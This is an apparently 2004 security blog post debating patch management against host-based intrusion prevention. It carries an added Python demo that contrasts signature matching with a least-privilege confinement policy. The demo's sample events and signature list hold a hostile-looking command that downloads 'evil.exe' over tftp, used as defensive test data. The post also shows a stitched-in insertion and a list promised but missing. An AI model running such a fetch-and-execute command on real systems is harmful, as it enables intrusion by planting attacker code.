March 29, 2004

Patching vs. Intrusion Prevention

I had better start this entry by stating that for a living (what puts bread on my table) I write computer security tools and technology, with my latest research into mandatory access control driven by providing "process rights management" through host-based intrusion prevention. Yes, it's a mouthful, but basically I have written code that grafts onto the Windows kernel to strengthen the Windows platform by providing application confinement and isolation from the rest of the system. The result is that I can apply the rule of least privilege to the resources on a machine and provide safe containment, isolating suspect or even hostile activity so that it cannot destroy the system.

The reason I am telling you this is that today I noticed a debate on Network World called "Is patch mgmt. the best protection against vulnerabilities?" in which Shavlik Technologies (for) and Sana Security (against) face off. It's hard to say this without you snickering at me, but I HATE it when two vendors are squared off to make an assessment for the information security profession when both have a stake in their position. (In case you didn't know, Shavlik sells patch management software and Sana sells intrusion prevention software.) The result is typically biased and slanted towards their products.

Let's get real. The reality is that BOTH are right, and BOTH are wrong, for different reasons. Let's look at this from an infosec point of view while understanding the mindset of an administrator responsible for the critical infrastructure of an organization.

Patch management is only effective when it is actually completed in a timely manner, so that the window of exposure to attack is reduced. If you look at the most recent trends, most exploits are built AFTER a patch is released, since it is much easier for an attacker to disassemble the patch, find the vulnerability (or vulnerabilities) it fixes, and write new hostile code to exploit it on the systems that have not yet applied it.
The "for" camp in this argument states that application and OS vendors don't always tell you what a patch fixes, which means you need to patch against the unknown. Here is the problem with that argument. How can an administrator at a Fortune 100 company blindly patch a system with code he knows nothing about, especially when he KNOWS the vendor isn't telling him everything? He can't. That is why such shops typically do a staged roll-out in a "clean room", regression testing the patch against their existing architecture before it touches production. And in many cases the patches do more harm to their systems than good. Meanwhile, exploits for the patched flaw are being written, exposing the business to more risk the longer the roll-out takes. The time between patch release and exploit release is shortening as attackers get better at disassembly.

On the other side, the "against" camp states that because customers are not aware of new vulnerabilities they cannot defend against the new exploits, but that host-based intrusion prevention software will solve this. There is a catch they don't want to tell you about. Most intrusion prevention systems use a combination of signature-based techniques and whitelist databases to determine access control. The problem is that new 0-day attacks don't play by these rules: a signature for a flaw nobody knows about yet cannot exist, so the attack walks past the signature check, and attackers can typically get around such techniques. Moreover, if you use a stringent set of "don't" rules, you end up with an administrative nightmare trying to tune the IPS to work in your environment.

The proof is in how signature-based solutions have failed in other security verticals. Look at antivirus and personal firewalls as an example. The latest CSI/FBI Computer Crime and Security Survey shows that of the organizations that reported breaches in the last 12 months, 98% had firewalls in place and 99% had antivirus. Yet they were still breached. Does that mean we throw the technology out? No. It just means that these tools don't work alone, in isolation.
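To make the signature-versus-confinement point concrete, here is an added example (my own illustration for this entry, not code from the original post or from any vendor's product): a toy signature engine beside a default-deny, least-privilege resource policy, both run over a handful of constructed events. The process name `webserver.exe`, the paths, the signatures and the events are all made up for the demonstration. The second event is the known attack with nothing more than its whitespace changed, standing in for a 0-day the signature list has never seen.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed signatures for one hypothetical known attack.  A real engine
# carries thousands of these; only the shape of the check matters here.
SIGNATURES: List[bytes] = [
    b"cmd.exe /c tftp",
    b"\x90\x90\x90\x90\xeb",
]


@dataclass(frozen=True)
class Event:
    process: str    # image name of the process performing the action
    action: str     # "file_write", "file_exec", "net_connect", ...
    target: str     # file path or host:port the action touches
    payload: bytes  # data associated with the action, if any


def signature_match(event: Event) -> bool:
    """Signature engine: block if a known byte pattern appears in the payload."""
    return any(sig in event.payload for sig in SIGNATURES)


# Least-privilege policy (constructed): for each confined process, the actions
# it may take and the targets it may take them on.  Anything not listed is
# denied, so the policy never needs to know what an attack looks like.
Policy = Dict[str, Dict[str, Set[str]]]
POLICY: Policy = {
    "webserver.exe": {
        "file_write": {r"C:\inetpub\logs\*"},
        "net_connect": {"*:80", "*:443"},
    },
}


def _glob_match(pattern: str, value: str) -> bool:
    """Case-insensitive match where '*' in the pattern means 'anything'."""
    regex = re.escape(pattern).replace(r"\*", ".*")
    return re.fullmatch(regex, value, re.IGNORECASE) is not None


def policy_allows(event: Event, policy: Policy = POLICY) -> bool:
    """Default deny: allowed only if process, action and target all match a rule."""
    targets = policy.get(event.process, {}).get(event.action, set())
    return any(_glob_match(p, event.target) for p in targets)


# Constructed events, in order: the known attack, the same attack trivially
# mutated (the signature list has never seen it), and two pieces of
# legitimate web-server activity that the policy explicitly permits.
SAMPLE_EVENTS: List[Event] = [
    Event("webserver.exe", "file_exec", r"C:\Windows\System32\cmd.exe",
          b"cmd.exe /c tftp -i 10.0.0.9 GET evil.exe"),
    Event("webserver.exe", "file_exec", r"C:\Windows\System32\cmd.exe",
          b"cmd.exe  /c  tftp -i 10.0.0.9 GET evil.exe"),
    Event("webserver.exe", "file_write", r"C:\inetpub\logs\ex040329.log",
          b"2004-03-29 GET /default.htm 200"),
    Event("webserver.exe", "net_connect", "10.0.0.5:443", b""),
]


def evaluate(events: List[Event]) -> List[Dict[str, bool]]:
    """For each event, report whether each layer on its own would block it."""
    return [
        {"signature_blocks": signature_match(ev),
         "policy_blocks": not policy_allows(ev)}
        for ev in events
    ]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{ev.action:12} {ev.target:36} {verdict}")
```

The signature layer catches only the first event; two extra spaces are enough to slip the second one past it. The confinement layer blocks both, because the web server was never granted `file_exec` on anything, while the log write and the HTTPS connection sail through. That is the difference between asking "does this look like a known attack?" and asking "is this process allowed to do this at all?", and it is also why the policy still has to be tuned: a rule the administrator forgets to write becomes a false positive the moment a legitimate application needs it.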
And how much WORSE would those breaches have been WITHOUT the technology in place? To properly defend against these threats we need a layered defensive posture that includes it all: firewalls, antivirus, network IDS, host-based IPS and patch management. Our decisions have to be part of a BIGGER process in the security management lifecycle. (This is why Schneier says security is a process, not a product.) Remember when I was talking about the 8 rules of Information Security last year? Using a defensive posture like this touches on almost every rule:
My point here, folks, is that as vendors we sometimes seem to use FUD or "tainted" messaging to sell our products. Don't buy into it. (And if you ever see my company do it, please email me with a stern warning and point me to this entry.) Always consider the bigger picture of your security management lifecycle when evaluating technology. After all, technology is simply an enabler. It's not the solution! Oh, and if you ARE going to roll out host-based intrusion prevention on Microsoft Windows servers, contact me. I might be able to help you out. :)

Posted by SilverStr at March 29, 2004 09:15 AM